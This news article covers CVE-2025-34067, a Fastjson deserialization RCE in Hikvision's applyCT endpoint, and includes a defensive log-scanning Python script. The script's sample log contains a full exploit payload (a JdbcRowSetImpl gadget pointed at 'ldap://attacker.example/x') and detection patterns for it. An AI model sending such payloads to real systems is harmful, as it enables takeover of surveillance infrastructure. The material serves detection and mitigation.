Severe Hikvision applyCT Flaw Allows Remote Code Execution on Devices

A newly discovered vulnerability in Hikvision’s widely used applyCT security management platform has put thousands of surveillance and monitoring infrastructures at risk, raising urgent concerns for organizations worldwide.

Tracked as CVE-2025-34067 and rated with the maximum severity (CVSS 10), the flaw allows for unauthenticated remote code execution (RCE), potentially granting attackers full control over affected systems.

How the Vulnerability Works

The vulnerability stems from the use of a vulnerable version of the Fastjson library in the applyCT component of the Hikvision Integrated Security Management Platform (also known as HikCentral).

Fastjson is a popular Java library for parsing JSON data, but its “auto-type” feature, which lets a JSON document name the Java class that should be instantiated, can be abused when it is left enabled and unrestricted.

Attackers can send a specially crafted JSON payload to the /bic/ssoService/v1/applyCT endpoint, tricking the system into deserializing a malicious Java class (specifically JdbcRowSetImpl) that in turn loads code from an attacker-controlled LDAP server.

This attack vector does not require authentication, meaning any instance reachable from the internet can be attacked without credentials.

Once exploited, attackers can execute arbitrary commands, hijack surveillance feeds, manipulate security devices, or move laterally within the network, potentially launching further internal attacks.

Impact and Urgent Mitigation Steps

Hikvision’s applyCT platform is a cornerstone for security operations in commercial, governmental, and industrial sectors, providing centralized management of video, access, intercom, and alarm systems.

Its integration with advanced analytics and scalability has made it a trusted solution for high-security environments.

However, this critical flaw turns a cybersecurity issue into a physical security threat, as attackers could disrupt or disable entire surveillance operations.

Security experts urge organizations using Hikvision applyCT or any HikCentral variant to act immediately:

  • Audit systems to determine whether the vulnerable /bic/ssoService/v1/applyCT endpoint is exposed.
  • Update to a patched Fastjson library or apply the security updates provided by Hikvision.
  • Restrict internet access to the system unless it is strictly necessary.
  • Monitor for suspicious outbound LDAP traffic from the platform, which could indicate exploitation attempts.
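The auto-type abuse described above and the first and last mitigation steps (checking who can reach the applyCT endpoint, and watching for signs of exploitation) can be turned into a simple log check. The following Python script is an added example for this article, not code from Hikvision or from the Fastjson project. It assumes a hypothetical reverse-proxy log format with one JSON record per request (client address, request line, captured body); the log lines, the addresses and the internal network ranges are constructed for the example. It flags requests to the endpoint that come from outside the internal ranges (exposure), and bodies that carry Fastjson's "@type" key, the JdbcRowSetImpl class named in the advisory, or a JNDI-style lookup URL.

```python
import ipaddress
import json
import re
from dataclasses import dataclass

# Endpoint named in the advisory.
APPLYCT_PATH = "/bic/ssoService/v1/applyCT"
# Fastjson's polymorphic-type key; legitimate applyCT traffic has no reason to carry it.
AUTOTYPE_KEY = "@type"
# Gadget class named in the advisory; extend this from your own denylist.
SUSPICIOUS_CLASSES = ("com.sun.rowset.JdbcRowSetImpl",)
# JNDI lookup URLs that an auto-type gadget would be pointed at.
JNDI_URL = re.compile(r"\b(?:ldap|ldaps|rmi)://", re.IGNORECASE)

# Constructed sample log in a hypothetical proxy format (not real Hikvision output).
SAMPLE_LOG = r"""
{"src": "10.20.0.15", "req": "POST /bic/ssoService/v1/applyCT", "body": "{\"userName\":\"ops\",\"ticket\":\"abc\"}"}
{"src": "203.0.113.44", "req": "POST /bic/ssoService/v1/applyCT", "body": "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://attacker.example/x\"}"}
{"src": "10.20.0.15", "req": "GET /bic/health", "body": ""}
{"src": "198.51.100.9", "req": "POST /bic/ssoService/v1/applyCT", "body": "not json {\"@type\""}
"""


def _type_names(node):
    """Yield every value of an "@type" key anywhere in a parsed JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == AUTOTYPE_KEY and isinstance(value, str):
                yield value
            yield from _type_names(value)
    elif isinstance(node, list):
        for item in node:
            yield from _type_names(item)


def body_indicators(body: str) -> list:
    """Return the reasons a request body looks like a Fastjson auto-type probe."""
    reasons = []
    if JNDI_URL.search(body):
        reasons.append("jndi-url")
    try:
        doc = json.loads(body)
    except ValueError:
        # Malformed body that still carries the marker: fuzzing or a broken attempt.
        if AUTOTYPE_KEY in body:
            reasons.append("autotype-key-in-malformed-json")
        return reasons
    names = list(_type_names(doc))
    if names:
        reasons.append("autotype-key")
    if any(name in SUSPICIOUS_CLASSES for name in names):
        reasons.append("known-gadget-class")
    return reasons


@dataclass(frozen=True)
class Finding:
    line_no: int
    src: str
    reasons: tuple


def scan_log(text: str,
             internal_nets=("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")) -> list:
    """Flag applyCT requests that are externally sourced or carry auto-type indicators."""
    nets = [ipaddress.ip_network(n) for n in internal_nets]
    findings = []
    for line_no, raw in enumerate(text.strip().splitlines(), 1):
        rec = json.loads(raw)
        _method, _, path = rec["req"].partition(" ")
        if path.split("?", 1)[0] != APPLYCT_PATH:
            continue  # only the vulnerable endpoint is of interest here
        reasons = []
        if not any(ipaddress.ip_address(rec["src"]) in net for net in nets):
            reasons.append("external-source")  # endpoint reachable from outside
        reasons.extend(body_indicators(rec.get("body", "")))
        if reasons:
            findings.append(Finding(line_no, rec["src"], tuple(reasons)))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding.line_no}: {finding.src} -> {', '.join(finding.reasons)}")
```

Point the script at your own proxy or WAF export once the record format matches; an "external-source" hit on its own already answers the exposure question in the first mitigation step, while "known-gadget-class" or "jndi-url" hits should be correlated with outbound LDAP connections from the platform host.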

Failure to address this vulnerability could result in unauthorized access, data breaches, operational disruption, financial loss, and reputational damage.

Given the widespread deployment of Hikvision platforms, the urgency to patch and secure affected systems cannot be overstated.

AnuPriya
AnuPriya is a cybersecurity reporter at Cyber Press, specializing in cyber attacks, dark web monitoring, data breaches, vulnerabilities, and malware. She delivers in-depth analysis on emerging threats and digital security trends.